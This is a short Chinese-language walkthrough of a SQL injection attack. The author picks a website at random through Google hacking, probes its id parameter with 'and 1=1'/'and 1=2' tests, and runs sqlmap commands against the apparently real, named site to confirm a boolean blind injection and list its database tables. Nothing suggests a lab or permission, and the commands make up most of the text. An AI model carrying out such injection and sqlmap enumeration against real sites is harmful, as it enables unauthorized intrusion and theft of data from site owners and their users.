这里先google hacking随便找一个,反复实验试一下
这里用这个示例,先按流程进行排查
Id=22 and 1=1有回显
Id=22 and 1=2无回显
判断有sql注入
这里用的sqlmap进行爆破
# sqlmap -u "http://www.chinahongs.com/gyhy.asp?id=22" --batch
发现是布尔盲注型漏洞
后面直接使用sqlmap指令进行爆破
sqlmap -u "http://www.chinahongs.com/gyhy.asp?id=22" --batch --tables
再查表查字段获取更多信息便不演示啦